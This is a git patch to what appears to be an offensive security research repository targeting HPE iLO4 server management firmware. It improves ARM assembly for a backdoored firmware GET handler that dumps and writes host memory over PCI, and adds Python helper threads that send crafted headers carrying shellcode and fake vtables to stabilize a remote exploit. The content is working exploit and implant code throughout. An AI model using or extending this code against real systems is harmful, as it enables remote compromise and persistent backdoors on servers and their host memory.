From a3e4b312a89adad2ad9833dff79f5d11703227eb Mon Sep 17 00:00:00 2001 From: 0xf4b Date: Wed, 19 Dec 2018 16:38:36 +0100 Subject: [PATCH] - Fix stability issues in the backdoored firmware - Make exploits great again! Stability++ --- scripts/iLO4/GET_handler.S | 83 ++++++++++++-------- scripts/iLO4/exploits/exploit_check_flash.py | 2 + scripts/iLO4/exploits/exploit_helpers.py | 53 ++++++++++++- 3 files changed, 104 insertions(+), 34 deletions(-) diff --git a/scripts/iLO4/GET_handler.S b/scripts/iLO4/GET_handler.S index 893f7b0..0c5427b 100644 --- a/scripts/iLO4/GET_handler.S +++ b/scripts/iLO4/GET_handler.S @@ -11,8 +11,8 @@ start: MOV R0, SP BL bzero - MOV R0, #8 - BL memmap + MOV R0, #8 + BL memmap MOV R0, R7 LDR R10, get_query_string @@ -21,7 +21,7 @@ start: CMP R0, #0 BEQ error_400 - MOV R2, #0x100 + MOV R2, #0x1000 MOV R1, R0 BL get_storage ADD R0, R0, #0x2000 @@ -463,6 +463,8 @@ check_wmem_size: LDR R1, [SP, #0xF0] CMP R1, #0 BEQ err_wmem + CMP R1, #0xffffffff + BEQ err_wmem do_wmem: LDR R3, [SP, #0xF0] @@ -553,24 +555,24 @@ dmp_host: MOV R0, R6 BL go_200_headers - LDR R0, [SP, #0x10] - MOV R2, #0 - MOV R1, R2 - BL WaitForSemaphore + LDR R0, [SP, #0x10] + MOV R2, #0 + MOV R1, R2 + BL WaitForSemaphore - MOV R0, #2 - STR R0, [SP, #0x14] + MOV R0, #2 + STR R0, [SP, #0x14] dmp_host_loop: MOV R3, R8, LSL #8 - ORR R2, R3, R7, LSR #24 - LDRB R3, [SP, #0x14] + ORR R2, R3, R7, LSR #24 + LDRB R3, [SP, #0x14] BIC R2, R2, #0xFF000000 - ORR R2, R2, R3, LSL #24 - BL get_pcireg - STR R2, [R0] - BIC R2, R7, #0xFF000000 - ADD R0, R2, #0x81000000 + ORR R2, R2, R3, LSL #24 + BL get_pcireg + STR R2, [R0] + BIC R2, R7, #0xFF000000 + ADD R0, R2, #0x81000000 STR R0, [SP, #0xC] @@ -595,8 +597,14 @@ dmp_host_loop: B dmp_host_loop dmp_host_end: - LDR R0, [SP, #0x10] - BL ReleaseSemaphore + LDR R0, [SP, #0x10] + BL ReleaseSemaphore + + LDR R0, [SP, #0x10] + BL ReleaseResource + + LDR R0, [SP] + BL ReleaseResource MOV R0, R6 BL go_200_close @@ -637,23 +645,23 @@ wmem_host: ADD R0, SP, #0x10 BL RequestResource - LDR R0, [SP, #0x10] - MOV R2, #0 - MOV R1, R2 - BL WaitForSemaphore + LDR R0, [SP, #0x10] + MOV R2, #0 + MOV R1, R2 + BL WaitForSemaphore - MOV R0, #2 - STR R0, [SP, #0x14] + MOV R0, #2 + STR R0, [SP, #0x14] MOV R3, R8, LSL #8 - ORR R2, R3, R7, LSR #24 - LDRB R3, [SP, #0x14] + ORR R2, R3, R7, LSR #24 + LDRB R3, [SP, #0x14] BIC R2, R2, #0xFF000000 - ORR R2, R2, R3, LSL #24 - BL get_pcireg - STR R2, [R0] - BIC R2, R7, #0xFF000000 - ADD R0, R2, #0x81000000 + ORR R2, R2, R3, LSL #24 + BL get_pcireg + STR R2, [R0] + BIC R2, R7, #0xFF000000 + ADD R0, R2, #0x81000000 STR R0, [SP, #0xC] @@ -665,7 +673,13 @@ wmem_host: BL CopyToMemoryRegion LDR R0, [SP, #0x10] - BL ReleaseSemaphore + BL ReleaseSemaphore + + LDR R0, [SP, #0x10] + BL ReleaseResource + + LDR R0, [SP] + BL ReleaseResource MOV R0, R6 BL go_200_headers @@ -710,6 +724,11 @@ RequestResource: BX R10 RequestResource_fn: .word 0x17A3948 +ReleaseResource: + LDR R10, ReleaseResource_fn + BX R10 +ReleaseResource_fn: .word 0x17808FC + WaitForSemaphore: LDR R10, WaitForSemaphore_fn BX R10 diff --git a/scripts/iLO4/exploits/exploit_check_flash.py b/scripts/iLO4/exploits/exploit_check_flash.py index a68e840..2ff07c4 100644 --- a/scripts/iLO4/exploits/exploit_check_flash.py +++ b/scripts/iLO4/exploits/exploit_check_flash.py @@ -78,7 +78,9 @@ if version != ilo_version.replace(".",""): print "[-] Bad version specified in command line" +ths = fill_threads(sys.argv[1], sc_headers + cookies_headers + vtable_headers) send_exploit(s, sc_headers + cookies_headers + vtable_headers, o) +stop_threads(ths) btmp = "" out = "" diff --git a/scripts/iLO4/exploits/exploit_helpers.py b/scripts/iLO4/exploits/exploit_helpers.py index ffd8f73..3a7050c 100644 --- a/scripts/iLO4/exploits/exploit_helpers.py +++ b/scripts/iLO4/exploits/exploit_helpers.py @@ -8,6 +8,9 @@ from keystone import * from exploit_offsets import * +import threading +from time import sleep + sc_offset = 0x1000 vtable_offset = 0x100 @@ -27,11 +30,11 @@ def get_version_info(version): return EXP_OFFSETS[version] def ssl_connector(addr, port): - print "[*] Connecting to %s..." % sys.argv[1] + print "[*] Connecting to %s..." % addr sraw = socket.socket() s = ssl.wrap_socket(sraw) - s.connect((sys.argv[1], 443)) + s.connect((addr, port)) print "[+] Connected" return s @@ -122,6 +125,52 @@ def get_xml_version(s, headers): print "[*] Found iLO version %s" % ilo_version return ilo_version +def fill_threads(host, headers): + th = [] + for i in xrange(3): + th.append(fillingThread(host, headers)) + for i in xrange(3): + th[i].start() + while not all(th[i].sentflag for i in xrange(3)): + sleep(0.1) + return th + +def stop_threads(ths): + for th in ths: + th.stop() + +class fillingThread(threading.Thread): + def __init__(self, host, headers): + threading.Thread.__init__(self) + self.stopflag = False + try: + self.s = ssl_connector(host, 443) + except: + self.s = None + self.headers = headers + self.sentflag = False + + def run(self): + if self.s is None: + return + print "[*] Filling buffer..." + + self.buf = "GET / HTTP/1.1\r\n" + self.buf += "Host: ilo\r\n" + + self.buf += self.headers + + self.s.send(self.buf) + self.sentflag = True + + while not self.stopflag: + sleep(0.1) + print "[+] Releasing threads" + self.s.close() + + def stop(self): + self.stopflag = True + def send_exploit(s, headers, o): print "[*] Preparing request 2..."